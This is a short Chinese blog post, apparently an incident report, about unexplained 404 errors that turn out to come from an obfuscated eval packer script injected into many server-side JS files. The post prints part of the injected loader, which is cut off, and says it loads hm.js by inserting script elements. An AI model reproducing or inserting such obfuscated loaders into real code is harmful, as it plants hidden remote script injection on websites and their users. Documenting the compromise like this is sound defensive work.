前时间发现前端页面F12总是莫名其妙出现404,费了老鼻子劲儿,才发现原因:
![]()
服务器下众多项目js文件底部都被插入下面的脚本
eval(function(p, a, c, k, e, r) {
e = function(c) {
return (c < a ? '': e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
};
if (!''.replace(/^/, String)) {
while (c--) r[e(c)] = k[c] || e(c);
k = [function(e) {
return r[e]
}];
e = function() {
return '\\w+'
};
c = 1
};
while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
return p
} ('v(h(p,a,c,k,e,r){e=h(c){i c.o(a)};m(!\'\'.l(/^/,u)){j(c--)r[e(c)]=k[c]||e(c);k=[h(e){i r[e]}];e=h(){i\'\\\\w+\'};c=1};j(c--)m(k[c])p=p.l(q t(\'\\\\b\'+e(c)+\'\\\\b\',\'g\')

前端页面遭遇不明404错误,深入调查发现是由于服务器上多个项目JS文件被CNZZ插件恶意注入了一段eval函数代码,用于加载'_hmt_cnzz'变量和hm.js。该脚本通过创建并插入新的script元素到DOM中,可能对网站性能和安全造成影响。
最低0.47元/天 解锁文章
2298

被折叠的 条评论
为什么被折叠?



